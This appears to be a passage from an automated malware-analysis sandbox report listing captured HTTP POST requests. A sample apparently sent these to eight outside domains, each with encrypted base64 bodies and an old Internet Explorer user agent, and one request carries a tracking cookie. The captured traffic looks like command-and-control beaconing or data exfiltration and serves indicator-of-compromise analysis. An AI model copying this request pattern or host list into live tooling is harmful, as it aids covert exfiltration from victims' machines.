                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 59 64 53 4d 65 39 78 6e 53 35 6b 32 4e 46 70 2b 42 2b 45 67 4e 57 2f 4c 69 67 2f 30 61 58 76 2b 30 41 35 69 58 49 6c 58 66 31 66 6e 34 59 52 49 4c 64 54 79 30 57 65 50 34 50 42 69 51 48 4a 48 2f 78 6c 58 5a 78 6f 39 71 59 4b 36 36 75 4a 38 31 36 34 50 54 4f 4c 65 52 4d 73 32 32 62 61 76 54 37 31 51 70 48 2b 55 49 43 71 69 4b 35 59 4d 70 41 78 30 6d 41 67 75 6c 50 65 45 6a 6c 65 64 55 71 79 47 63 34 51 6d 37 53 45 66 67 51 46 47 51 65 42 32 4c 43 48 69 51 6c 4b 59 2b 6d 54 72 43 4c 54 44 70 41 68 66 54 2b 48 59 7a 37 73 74 6a 79 2b 42 37 67 64 41 41 49 52 35 4f 59 64 6a 38 6f 78 4a 79 30 49 48 45 6b 54 78 49 64 2b 36 46 4d 50 36 42 43 58 58 49 44 63 35 71 55 37 64 73 61 61 59 5a 2b 7a 2f 66 4a 57 32 7a 42 73 6d 68 71 37 57 4b 62 4e 59 75 6c 42 31 48 49 74 38 76 70 65 74 6d 79 34 4b 32 75 4f 65 6e 64 55 62 6e 63 43 75 62 77 56 58 59 47 2f 66 68 4d 7a 46 32 36 66 72 54 4d 41 42 76 5a 30 33 32 73 51 32 62 6a 63 35 37 39 55 59 48 78 58 63 54 53 74 68 42 79 38 59 39 72 6c 7a 31 66 7a 2b 30 57 2f 67 54 67 44 4d 38 43 54 4d 67 4a 43 41 6b 51 65 43 44 4c 53 70 48 63 32 6f 61 64 46 77 56 6e 38 58 76 66 50 6a 34 76 4f 54 71 45 34 44 6a 67 37 70 7a 53 72 4a 4d 50 36 78 57 79 61 31 67 4c 31 50 36 31 30 47 72 7a 6e 71 35 64 31 76 4f 2b 54 45 59 31 59 6a 76 66 75 42 52 75 4e 59 63 62 4d 6e 38 6a 50 6e 61 33 64 4d 6b 4f 35 41 45 79 65 47 4c 30 2f 55 41 77 50 62 2f 64 39 30 65 72 39 6d 38 62 62 63 36 33 53 73 75 75 42 6a 31 37 6c 47 62 64 38 69 6e 35 78 41 75 77 75 7a 55 79 75 6b 79 33 58 50 78 53 6a 6a 35 4f 74 6d 36 55 70 49 4b 49 69 6a 72 51 43 4a 73 44 36 51 6a 62 6d 62 32 42 42 4a 4e 44 30 76 39 4f 79 6f 79 59 47 51 32 56 4e 51 54 34 47 44 68 6c 2f 39 58 71 79 67 4f 6e 65 67 73 43 77 65 4e 41 3d 3d Data Ascii: YdSMe9xnS5k2NFp+B+EgNW/Lig/0aXv+0A5iXIlXf1fn4YRILdTy0WeP4PBiQHJH/xlXZxo9qYK66uJ8164PTOLeRMs22bavT71QpH+UICqiK5YMpAx0mAgulPeEjledUqyGc4Qm7SEfgQFGQeB2LCHiQlKY+mTrCLTDpAhfT+HYz7stjy+B7gdAAIR5OYdj8oxJy0IHEkTxId+6FMP6BCXXIDc5qU7dsaaYZ+z/fJW2zBsmhq7WKbNYulB1HIt8vpetmy4K2uOendUbncCubwVXYG/fhMzF26frTMABvZ032sQ2bjc579UYHxXcTSthBy8Y9rlz1fz+0W/gTgDM8CTMgJCAkQeCDLSpHc2oadFwVn8XvfPj4vOTqE4Djg7pzSrJMP6xWya1gL1P610Grznq5d1vO+TEY1YjvfuBRuNYcbMn8jPna3dMkO5AEyeGL0/UAwPb/d90er9m8bbc63SsuuBj17lGbd8in5xAuwuzUyuky3XPxSjj5Otm6UpIKIijrQCJsD6Qjbmb2BBJND0v9OyoyYGQ2VNQT4GDhl/9XqygOnegsCweNA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 57 63 31 62 51 49 55 72 51 5a 6e 37 62 77 35 58 72 43 63 53 50 50 36 74 45 56 64 54 46 56 76 6b 69 56 67 45 68 68 4f 55 75 65 55 66 39 30 42 58 41 31 38 6a 30 56 49 42 74 79 41 37 43 4d 51 31 34 67 39 65 42 61 6e 45 56 64 65 7a 30 77 61 6a 39 4b 4e 76 4b 61 4c 6f 47 4b 53 4b 73 6e 63 76 49 5a 63 61 55 68 44 6a 68 78 59 50 4f 50 31 7a 79 50 75 74 6b 41 7a 37 38 79 57 41 7a 32 2f 67 61 76 64 2f 53 48 6a 4d 54 78 67 34 62 69 66 45 4f 44 6c 30 45 77 43 79 30 6e 2f 6c 68 36 39 66 4e 6e 33 76 47 62 67 76 38 68 48 51 39 79 46 36 45 76 67 45 30 4a 52 2b 78 54 68 77 32 45 52 73 47 55 4d 49 52 7a 38 79 36 48 6f 55 38 51 33 7a 4e 4b 36 6f 72 79 32 33 4b 58 70 63 69 6a 57 55 34 33 61 6d 4f 64 4c 79 59 73 52 4f 6f 34 43 71 49 41 7a 6c 52 72 41 6d 51 62 37 6e 62 6c 45 52 77 4f 70 4a 37 2f 65 48 6b 54 45 50 34 5a 61 59 58 51 4a 38 44 74 79 43 33 71 72 32 2f 41 50 42 33 64 71 4f 69 42 76 78 41 34 41 51 6a 7a 33 6c 6b 6d 54 76 35 46 7a 68 33 39 64 43 33 57 37 33 41 43 55 6e 65 34 67 50 52 68 6f 41 69 6c 4a 48 41 67 33 58 52 32 69 50 4c 47 6b 48 4b 68 33 4e 64 55 69 5a 66 42 58 4b 65 50 65 69 63 49 76 71 38 51 42 37 67 34 6c 42 50 4d 4e 63 39 33 2f 7a 77 31 64 46 30 4d 61 68 45 45 52 31 4d 30 4a 42 54 62 4f 76 72 66 75 58 48 2f 34 31 66 35 69 41 36 42 45 66 76 33 58 35 32 6a 61 39 69 6a 55 31 69 49 72 62 45 37 7a 32 4e 73 54 33 35 7a 54 70 76 63 74 72 6c 37 72 65 55 69 58 6f 30 4f 77 66 6f 74 47 58 45 46 76 69 55 36 35 47 54 41 42 57 48 4d 41 57 75 43 68 2b 6e 67 6e 70 70 61 46 51 32 70 71 30 51 71 47 38 2f 6f 6a 68 62 4d 75 53 72 31 35 30 66 49 4a 33 6b 65 6f 58 43 79 5a 69 42 4f 4c 6f 37 57 74 66 46 33 50 65 31 37 65 47 Data Ascii: Wc1bQIUrQZn7bw5XrCcSPP6tEVdTFVvkiVgEhhOUueUf90BXA18j0VIBtyA7CMQ14g9eBanEVdez0waj9KNvKaLoGKSKsncvIZcaUhDjhxYPOP1zyPutkAz78yWAz2/gavd/SHjMTxg4bifEODl0EwCy0n/lh69fNn3vGbgv8hHQ9yF6EvgE0JR+xThw2ERsGUMIRz8y6HoU8Q3zNK6ory23KXpcijWU43amOdLyYsROo4CqIAzlRrAmQb7nblERwOpJ7/eHkTEP4ZaYXQJ8DtyC3qr2/APB3dqOiBvxA4AQjz3lkmTv5Fzh39dC3W73ACUne4gPRhoAilJHAg3XR2iPLGkHKh3NdUiZfBXKePeicIvq8QB7g4lBPMNc93/zw1dF0MahEER1M0JBTbOvrfuXH/41f5iA6BEfv3X52ja9ijU1iIrbE7z2NsT35zTpvctrl7reUiXo0OwfotGXEFviU65GTABWHMAWuCh+ngnppaFQ2pq0QqG8/ojhbMuSr150fIJ3keoXCyZiBOLo7WtfF3Pe17eG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 30 66 6b 4e 64 75 7a 70 51 70 6c 36 78 45 43 52 31 39 77 55 68 76 39 6e 4c 65 42 45 50 53 36 72 34 47 46 2f 74 36 73 75 70 54 41 67 5a 66 42 4c 4f 4c 30 56 47 6a 36 72 65 54 5a 6e 53 42 71 62 33 6e 52 79 67 4a 79 34 73 67 67 4f 42 77 34 4c 31 64 6e 33 6e 77 4a 63 68 4a 4c 32 48 64 71 56 52 57 34 4f 6b 63 65 66 4a 51 51 47 44 39 32 78 6c 4e 38 7a 30 71 6f 62 68 39 4a 57 61 58 76 4e 65 46 61 7a 76 31 71 79 39 72 61 32 44 49 7a 56 70 46 42 57 52 36 57 62 4b 58 6a 51 30 79 4c 70 46 66 6b 4e 42 72 36 56 66 34 49 6a 75 31 4d 33 33 34 75 68 57 64 2f 6c 4f 67 43 65 38 58 68 54 41 45 6e 2b 77 77 6a 2f 32 46 4e 6a 6d 30 4e 4f 4b 6b 76 4b 36 31 53 72 6e 6b 53 74 75 66 72 5a 52 46 6e 6e 42 48 6a 65 64 6d 37 42 6f 49 31 62 4a 4f 78 79 62 45 4e 4a 37 51 38 38 77 63 37 67 4a 55 30 4e 31 4f 70 32 63 67 4d 62 63 6f 76 6e 51 66 56 77 5a 37 67 54 32 6a 6f 4b 4b 33 76 6f 47 64 79 53 37 56 62 63 31 6c 4c 6a 73 6b 50 64 70 33 64 56 49 4d 63 39 52 33 34 76 63 72 4c 54 6e 4e 61 7a 36 56 69 6a 6a 4e 5a 41 34 49 51 53 53 56 74 50 77 37 69 79 4c 63 34 43 61 74 68 58 50 2b 74 4a 4c 65 66 47 39 30 4d 52 50 4a 62 52 69 32 65 6d 68 6c 4b 48 75 75 62 64 53 47 6c 33 62 4f 39 7a 72 42 2b 44 55 44 31 75 6a 48 2f 41 6e 50 37 62 6e 30 6c 31 49 56 77 70 74 78 4a 67 74 30 2f 61 2f 38 44 6c 57 4b 59 6e 54 75 74 58 72 47 79 43 66 37 6a 4a 73 45 6a 46 37 63 75 6f 4c 64 35 68 70 78 74 6a 2f 6e 4a 73 62 6e 4a 6c 68 78 36 4b 35 53 78 2b 62 58 58 34 41 65 53 6f 6b 46 61 34 4e 6b 4a 75 33 61 7a 42 38 6f 2b 36 45 4a 67 6c 4b 57 6f 33 43 47 4c 51 37 75 39 4d 49 52 6c 55 49 48 6b 61 68 66 31 4f 42 49 37 55 32 39 31 38 34 4a 54 32 51 44 41 68 2f 44 53 54 71 65 2f 74 34 44 31 79 41 4e 62 6a 6e 4b 38 73 39 51 65 54 37 71 4e 45 78 35 6a 32 56 73 64 72 4f 57 43 63 4b 6a 42 5a 4a 30 41 51 62 77 61 6f Data Ascii: 0fkNduzpQpl6xECR19wUhv9nLeBEPS6r4GF/t6supTAgZfBLOL0VGj6reTZnSBqb3nRygJy4sggOBw4L1dn3nwJchJL2HdqVRW4OkcefJQQGD92xlN8z0qobh9JWaXvNeFazv1qy9ra2DIzVpFBWR6WbKXjQ0yLpFfkNBr6Vf4Iju1M334uhWd/lOgCe8XhTAEn+wwj/2FNjm0NOKkvK61SrnkStufrZRFnnBHjedm7BoI1bJOxybENJ7Q88wc7gJU0N1Op2cgMbcovnQfVwZ7gT2joKK3voGdyS7Vbc1lLjskPdp3dVIMc9R34vcrLTnNaz6VijjNZA4IQSSVtPw7iyLc4CathXP+tJLefG90MRPJbRi2emhlKHuubdSGl3bO9zrB+DUD1ujH/AnP7bn0l1IVwptxJgt0/a/8DlWKYnTutXrGyCf7jJsEjF7cuoLd5hpxtj/nJsbnJlhx6K5Sx+bXX4AeSokFa4NkJu3azB8o+6EJglKWo3CGLQ7u9MIRlUIHkahf1OBI7U29184JT2QDAh/DSTqe/t4D1yANbjnK8s9QeT7qNEx5j2VsdrOWCcKjBZJ0AQbwao
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=84.17.52.43; btst=a866d6d029f7e7b2ff9182571db796ea|84.17.52.43|1690487581|1690487540|11|3|0Data Raw: 48 59 73 38 42 6f 36 59 52 35 6e 49 36 6b 2f 49 47 55 61 34 63 66 48 6b 64 6c 4f 4f 4a 65 78 6d 6f 6e 6c 4d 4d 44 57 51 36 66 67 76 71 56 66 63 62 53 51 71 32 38 49 34 57 53 4f 4a 69 36 6e 75 4e 4c 49 43 66 45 41 2b 52 68 6c 6b 48 45 58 2b 70 6b 43 4e 36 53 61 44 4c 56 52 44 76 54 6b 49 4b 6b 6d 37 2f 6a 72 4e 4f 35 36 43 53 78 31 30 54 6b 4e 66 37 2f 57 38 45 70 6c 54 6b 58 72 47 4b 65 51 38 50 76 50 4d 2f 67 67 55 79 6d 71 59 55 49 73 33 61 34 58 53 61 5a 4b 64 5a 58 55 76 50 41 6e 2b 57 46 4a 57 76 4e 31 74 47 79 51 34 55 31 53 44 52 61 58 76 2b 4e 59 54 51 53 48 2b 32 39 32 51 6e 71 70 59 70 2f 78 67 69 6d 4f 61 72 64 52 33 2b 6f 79 54 46 6d 2b 7a 4b 61 32 41 4a 61 48 32 51 79 35 52 58 66 71 49 33 31 4c 68 6c 78 31 4d 66 61 74 69 6d 52 43 54 42 45 6d 68 62 39 4f 52 65 47 48 54 66 6f 66 53 66 47 41 6c 52 37 6e 6c 68 43 54 6a 5a 61 49 41 71 49 77 49 75 43 6b 61 54 54 6f 70 37 39 67 2b 58 36 64 35 61 74 4f 45 52 77 70 68 79 54 41 2f 62 6f 71 66 55 65 30 5a 30 73 2b 78 47 70 6c 53 53 6f 77 34 65 45 6a 6f 35 6e 4c 6e 4a 64 4e 2b 50 2b 75 47 50 62 52 57 67 59 58 33 31 7a 53 35 47 47 34 69 6c 4d 52 66 73 57 75 32 33 2b 6c 79 31 57 4e 2f 37 4b 37 7a 68 55 62 43 33 7a 6e 72 72 4b 49 4e 6d 54 59 4d 69 65 52 6f 59 65 45 44 42 69 4d 54 6c 65 46 5a 61 6e 49 55 46 43 69 58 78 57 67 4d 44 58 39 76 41 53 69 31 58 32 54 6a 58 32 50 57 35 59 68 63 45 51 33 59 67 52 4e 45 63 76 4f 69 5a 54 63 32 42 43 52 63 4c 4a 37 56 59 69 4e 69 71 4a 34 4c 6e 45 48 54 32 45 36 50 55 62 4f 52 56 70 78 69 68 43 66 2b 47 47 71 58 61 51 2f 6b 33 31 4e 50 59 33 35 42 65 31 6a 7a 56 6e 74 50 57 32 76 73 58 57 42 6c 51 70 33 70 43 69 57 4d 52 34 67 69 65 34 32 6b 50 75 78 6d 53 67 4b 6d 47 69 77 2b 72 6e 77 65 6e 73 38 46 46 77 4c 63 53 49 74 68 56 7a 63 76 36 38 71 4f 68 51 4a 45 51 51 3d 3d Data Ascii: HYs8Bo6YR5nI6k/IGUa4cfHkdlOOJexmonlMMDWQ6fgvqVfcbSQq28I4WSOJi6nuNLICfEA+RhlkHEX+pkCN6SaDLVRDvTkIKkm7/jrNO56CSx10TkNf7/W8EplTkXrGKeQ8PvPM/ggUymqYUIs3a4XSaZKdZXUvPAn+WFJWvN1tGyQ4U1SDRaXv+NYTQSH+292QnqpYp/xgimOardR3+oyTFm+zKa2AJaH2Qy5RXfqI31Lhlx1MfatimRCTBEmhb9OReGHTfofSfGAlR7nlhCTjZaIAqIwIuCkaTTop79g+X6d5atOERwphyTA/boqfUe0Z0s+xGplSSow4eEjo5nLnJdN+P+uGPbRWgYX31zS5GG4ilMRfsWu23+ly1WN/7K7zhUbC3znrrKINmTYMieRoYeEDBiMTleFZanIUFCiXxWgMDX9vASi1X2TjX2PW5YhcEQ3YgRNEcvOiZTc2BCRcLJ7VYiNiqJ4LnEHT2E6PUbORVpxihCf+GGqXaQ/k31NPY35Be1jzVntPW2vsXWBlQp3pCiWMR4gie42kPuxmSgKmGiw+rnwens8FFwLcSIthVzcv68qOhQJEQQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 6a 36 49 38 2f 32 64 65 52 35 6c 6e 6c 69 77 65 46 73 69 36 72 44 42 39 34 67 54 64 68 6d 55 6d 69 78 68 44 49 49 47 2f 78 58 4e 56 6d 58 63 6f 70 39 56 63 79 6e 6b 53 59 61 77 51 50 71 4a 59 69 71 38 2f 49 38 64 2f 71 35 66 32 31 4b 6b 34 43 31 67 79 38 4f 2f 58 49 6e 50 72 35 37 45 47 30 69 69 73 56 73 61 38 4f 73 34 6e 59 75 31 4d 4c 61 51 49 4d 6d 69 70 74 74 51 34 6e 6b 7a 62 46 38 35 53 54 72 66 35 37 47 4d 34 45 59 2b 54 69 72 65 30 37 4c 49 47 52 50 72 44 77 73 37 51 52 52 57 58 52 44 79 43 4b 78 67 6b 44 4f 36 54 46 6c 54 33 6e 57 6b 77 57 6e 66 4b 6a 49 46 55 37 75 58 6f 2f 53 59 4b 64 6c 73 4f 41 4d 4c 6e 2f 5a 6c 67 2b 63 30 62 42 6b 70 66 4f 37 62 4a 6a 73 77 31 74 77 38 52 41 4d 70 62 66 51 73 72 6a 52 43 42 6c 76 76 79 57 42 6e 36 4d 6b 41 74 75 42 38 6d 70 44 33 38 53 6e 47 4f 6b 42 73 59 38 58 69 38 7a 31 57 56 67 38 63 67 76 51 5a 42 6c 39 36 2f 38 69 2f 38 6c 42 42 32 70 48 4b 42 72 35 75 69 32 6f 77 6d 47 31 64 43 42 30 57 4d 78 35 45 75 63 54 2f 4c 69 50 5a 65 50 44 73 34 33 48 6f 65 44 6a 41 75 65 2f 75 41 42 33 76 71 31 35 2b 56 33 58 72 4b 70 57 4d 2b 47 73 78 2f 64 65 2f 50 6c 37 62 36 7a 73 47 2f 52 36 34 57 36 37 76 68 4c 73 63 69 54 62 6e 36 31 59 55 32 6e 39 55 78 71 62 56 50 65 62 4d 67 74 64 47 58 31 78 34 4d 64 37 38 4b 6f 2f 2f 39 71 2f 54 4c 6a 43 50 35 46 44 37 6c 32 44 44 49 79 55 57 48 52 2b 68 77 35 4e 6b 78 46 2f 2f 68 4d 6b 6d 30 6d 61 47 63 67 6b 49 65 78 43 59 35 65 74 52 43 31 45 44 30 64 55 2f 4e 4d 66 6d 71 33 65 45 48 52 68 30 4e 7a 64 79 50 71 50 32 36 68 55 6f 50 68 47 39 53 78 6d 38 6e 46 48 30 68 55 76 76 55 66 66 79 6b 33 59 73 71 77 75 6b 76 32 64 44 6c 4f 45 39 7a 55 37 6a 37 79 70 63 47 50 6f 4d 55 34 42 64 59 7a 4b 33 4c 57 4e 64 48 59 61 67 63 41 77 3d 3d Data Ascii: j6I8/2deR5lnliweFsi6rDB94gTdhmUmixhDIIG/xXNVmXcop9VcynkSYawQPqJYiq8/I8d/q5f21Kk4C1gy8O/XInPr57EG0iisVsa8Os4nYu1MLaQIMmipttQ4nkzbF85STrf57GM4EY+Tire07LIGRPrDws7QRRWXRDyCKxgkDO6TFlT3nWkwWnfKjIFU7uXo/SYKdlsOAMLn/Zlg+c0bBkpfO7bJjsw1tw8RAMpbfQsrjRCBlvvyWBn6MkAtuB8mpD38SnGOkBsY8Xi8z1WVg8cgvQZBl96/8i/8lBB2pHKBr5ui2owmG1dCB0WMx5EucT/LiPZePDs43HoeDjAue/uAB3vq15+V3XrKpWM+Gsx/de/Pl7b6zsG/R64W67vhLsciTbn61YU2n9UxqbVPebMgtdGX1x4Md78Ko//9q/TLjCP5FD7l2DDIyUWHR+hw5NkxF//hMkm0maGcgkIexCY5etRC1ED0dU/NMfmq3eEHRh0NzdyPqP26hUoPhG9Sxm8nFH0hUvvUffyk3Ysqwukv2dDlOE9zU7j7ypcGPoMU4BdYzK3LWNdHYagcAw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 66 43 4a 41 64 67 71 4d 55 35 6d 6d 61 43 73 71 62 51 74 7a 2f 4d 30 78 2b 77 32 36 74 4c 38 58 33 67 35 69 63 54 45 7a 50 55 36 72 48 56 32 54 4d 44 55 6b 53 67 78 4f 6d 48 59 4a 49 62 6e 37 43 30 42 2b 33 41 2f 5a 63 38 53 4f 34 57 73 69 63 6b 33 75 6f 53 6d 2b 63 74 78 4e 51 46 4b 34 38 53 74 55 30 39 43 7a 4f 4a 42 62 55 6d 78 30 54 43 4f 35 47 6c 36 6d 59 37 4b 32 6a 70 31 64 55 6a 58 6d 56 76 68 30 6d 52 75 78 63 79 47 6f 79 35 39 4c 36 45 54 6e 47 2f 4c 6c 30 58 72 76 31 76 7a 4a 6b 77 30 48 75 32 78 43 42 58 51 74 65 38 52 64 44 38 33 55 30 33 55 50 50 46 75 50 4b 42 6c 74 33 4b 37 63 35 57 38 51 54 6d 75 79 6b 57 39 37 64 4d 66 69 49 5a 65 70 73 72 76 72 72 37 49 45 48 59 6c 31 50 44 59 59 6e 35 7a 6e 58 72 4c 71 74 69 78 70 51 48 7a 62 37 70 71 34 47 55 51 46 4f 4e 66 32 70 59 52 5a 63 49 69 77 73 58 30 2b 73 59 73 72 65 76 53 5a 51 52 4e 51 71 54 32 51 36 77 4d 44 57 43 30 30 44 4e 50 58 45 6f 2b 5a 63 54 74 2b 74 4b 4a 57 46 45 67 63 42 4e 6f 6a 68 5a 68 48 6b 47 78 58 65 38 6d 39 72 79 39 65 38 42 47 4c 38 43 52 58 65 35 61 6a 56 74 57 42 76 71 69 44 76 76 62 4b 68 51 6f 61 56 36 6c 50 4c 41 57 34 59 4c 44 33 79 36 4c 6b 6c 64 48 5a 30 6f 6b 57 43 2f 56 35 4b 58 56 73 6f 67 42 6a 45 47 54 39 48 4e 2f 56 69 6f 4a 6d 32 62 6b 67 61 43 31 62 52 50 61 4a 66 4c 42 36 64 6a 4f 4d 65 44 30 68 69 56 67 56 62 35 6b 72 78 48 68 5a 4c 68 33 46 75 6b 54 55 31 34 45 6f 6b 67 65 46 48 71 74 67 65 76 57 61 4e 42 6d 54 55 71 41 50 62 6c 63 53 30 78 61 6f 61 41 65 76 77 55 48 2f 38 79 64 4f 43 6a 34 30 33 6f 4f 70 7a 6a 46 4c 50 67 54 63 64 5a 54 72 38 78 73 4a 56 76 4c 6e 53 49 69 59 68 56 64 71 36 61 35 75 30 65 6f 68 4e 57 55 46 79 76 44 32 34 4d 2b 34 35 5a 50 65 57 70 41 67 66 74 67 3d Data Ascii: fCJAdgqMU5mmaCsqbQtz/M0x+w26tL8X3g5icTEzPU6rHV2TMDUkSgxOmHYJIbn7C0B+3A/Zc8SO4Wsick3uoSm+ctxNQFK48StU09CzOJBbUmx0TCO5Gl6mY7K2jp1dUjXmVvh0mRuxcyGoy59L6ETnG/Ll0Xrv1vzJkw0Hu2xCBXQte8RdD83U03UPPFuPKBlt3K7c5W8QTmuykW97dMfiIZepsrvrr7IEHYl1PDYYn5znXrLqtixpQHzb7pq4GUQFONf2pYRZcIiwsX0+sYsrevSZQRNQqT2Q6wMDWC00DNPXEo+ZcTt+tKJWFEgcBNojhZhHkGxXe8m9ry9e8BGL8CRXe5ajVtWBvqiDvvbKhQoaV6lPLAW4YLD3y6LkldHZ0okWC/V5KXVsogBjEGT9HN/VioJm2bkgaC1bRPaJfLB6djOMeD0hiVgVb5krxHhZLh3FukTU14EokgeFHqtgevWaNBmTUqAPblcS0xaoaAevwUH/8ydOCj403oOpzjFLPgTcdZTr8xsJVvLnSIiYhVdq6a5u0eohNWUFyvD24M+45ZPeWpAgftg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 7a 37 34 7a 64 71 47 4c 55 35 6d 31 79 53 67 78 41 44 41 49 38 6e 6f 77 33 59 65 66 37 63 6f 79 5a 52 52 69 6a 73 2b 4f 57 51 51 71 35 2b 38 69 70 72 54 74 34 58 47 2f 39 7a 55 34 39 54 2b 38 41 64 76 38 4f 68 4f 44 35 4e 6d 66 45 41 4e 74 39 4d 31 77 6c 51 41 34 2b 32 63 39 57 73 58 7a 50 54 30 46 52 7a 79 57 41 59 74 32 38 6e 73 30 6f 62 30 58 64 4c 62 4b 4b 58 44 45 38 56 41 4d 71 31 4a 4a 77 49 55 4a 38 4f 65 6d 56 31 6c 48 57 42 4c 68 64 71 49 45 6f 69 4b 37 64 69 54 65 34 61 51 43 74 6c 36 74 52 5a 6f 2f 68 79 44 73 6a 4a 51 78 68 4e 37 75 43 79 73 6d 30 6c 68 31 6b 4e 39 44 58 49 76 62 59 57 59 51 51 62 44 46 67 72 58 4d 47 66 4f 36 79 63 2f 77 31 34 74 31 74 6e 64 6e 7a 71 6f 4f 67 70 49 6b 6f 4f 37 6d 66 39 64 79 79 44 78 52 74 65 4c 45 49 70 79 6f 78 64 64 38 6d 59 30 7a 67 58 32 78 6d 61 62 35 6e 4e 30 75 47 52 61 6a 54 5a 39 6e 46 7a 68 64 51 50 46 35 45 66 77 59 55 53 4e 37 47 34 59 4b 6e 51 6d 4d 46 4d 67 4f 73 48 54 35 62 6f 62 4f 44 4a 6d 6a 68 36 39 75 46 53 33 47 74 58 4e 57 31 45 53 46 47 4c 6c 37 54 39 63 61 6b 6a 61 63 79 37 56 49 32 6b 42 5a 38 6f 68 70 30 71 51 6e 75 6e 70 38 43 49 59 73 4c 53 34 7a 71 42 35 56 33 30 6a 66 31 78 59 50 4a 44 51 4d 38 55 36 48 32 6f 41 52 73 4f 4e 4e 72 47 77 45 56 76 52 36 51 34 30 6c 53 56 56 68 43 47 54 4a 4b 49 57 52 57 47 45 38 6e 47 73 52 67 67 49 5a 73 58 53 45 78 66 65 39 52 48 73 38 6c 72 51 45 34 6a 68 2b 4b 42 45 4b 4d 4d 6b 5a 70 69 4c 78 6c 73 49 4c 2b 6c 4c 69 6c 52 35 34 2b 50 78 75 59 38 2f 6e 6b 5a 72 37 43 68 57 5a 69 77 57 69 72 72 53 45 4b 6e 69 78 45 6c 57 55 74 6b 54 4c 79 67 4e 74 70 43 57 31 36 39 50 71 35 2b 49 3d Data Ascii: z74zdqGLU5m1ySgxADAI8now3Yef7coyZRRijs+OWQQq5+8iprTt4XG/9zU49T+8Adv8OhOD5NmfEANt9M1wlQA4+2c9WsXzPT0FRzyWAYt28ns0ob0XdLbKKXDE8VAMq1JJwIUJ8OemV1lHWBLhdqIEoiK7diTe4aQCtl6tRZo/hyDsjJQxhN7uCysm0lh1kN9DXIvbYWYQQbDFgrXMGfO6yc/w14t1tndnzqoOgpIkoO7mf9dyyDxRteLEIpyoxdd8mY0zgX2xmab5nN0uGRajTZ9nFzhdQPF5EfwYUSN7G4YKnQmMFMgOsHT5bobODJmjh69uFS3GtXNW1ESFGLl7T9cakjacy7VI2kBZ8ohp0qQnunp8CIYsLS4zqB5V30jf1xYPJDQM8U6H2oARsONNrGwEVvR6Q40lSVVhCGTJKIWRWGE8nGsRggIZsXSExfe9RHs8lrQE4jh+KBEKMMkZpiLxlsIL+lLilR54+PxuY8/nkZr7ChWZiwWirrSEKnixElWUtkTLygNtpCW169Pq5+I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 41 65 6f 2f 65 58 77 45 51 35 6d 47 4a 44 37 43 4a 35 57 37 4b 41 2b 74 53 71 6b 55 41 31 65 76 63 47 57 57 62 65 73 78 30 66 6d 71 6b 48 43 38 51 33 72 55 4e 50 73 77 6b 6e 4a 56 51 64 57 32 78 6b 49 4b 51 33 58 36 30 4f 6a 76 61 65 30 37 64 7a 66 5a 44 4a 74 4c 69 69 35 72 52 68 62 66 67 56 62 6a 59 33 33 74 7a 46 67 69 67 34 70 38 6c 76 65 37 2b 36 78 75 69 48 6f 38 6b 35 71 76 53 59 53 57 48 4c 39 36 72 69 49 52 57 64 71 31 64 54 64 69 4b 69 54 58 5a 76 72 39 67 4f 32 6d 6e 44 52 67 4d 61 47 63 5a 63 47 71 49 38 47 35 32 67 63 48 33 48 76 35 70 59 61 64 31 32 33 4d 54 74 46 37 43 53 6d 4c 65 4f 30 69 5a 55 66 57 52 76 47 50 6e 65 6f 62 73 63 41 66 65 39 50 32 67 72 48 59 2b 43 75 68 5a 49 62 58 6d 68 6f 59 6e 46 53 31 4a 4a 31 49 6c 35 44 42 31 38 69 77 74 6b 66 2f 4d 62 50 6f 2f 33 4b 66 79 6f 2b 4c 76 42 4d 4d 50 35 43 71 2b 4c 57 43 68 71 46 69 64 41 6f 70 2f 46 74 69 67 32 6c 52 66 46 37 67 4d 67 43 71 67 51 34 77 76 74 49 46 59 70 69 54 46 76 36 55 34 2f 31 32 68 72 59 76 52 64 68 69 50 6c 64 56 73 6e 47 75 35 62 4a 55 37 62 4e 34 48 55 76 44 35 47 67 4e 2b 61 36 6e 6c 5a 4b 70 74 79 61 2b 69 78 71 4f 55 52 4d 34 39 2f 42 35 63 4d 54 76 33 51 46 54 57 67 50 36 63 4f 2b 62 6e 49 68 6f 7a 58 32 50 53 2b 66 56 62 42 46 76 64 44 30 4b 4b 65 51 46 2b 31 67 62 77 37 74 49 63 42 4e 49 6b 6e 48 30 39 4d 71 62 38 7a 59 37 77 38 66 41 53 75 32 2f 37 2b 69 43 2b 77 6d 4d 4d 70 4e 6a 65 71 46 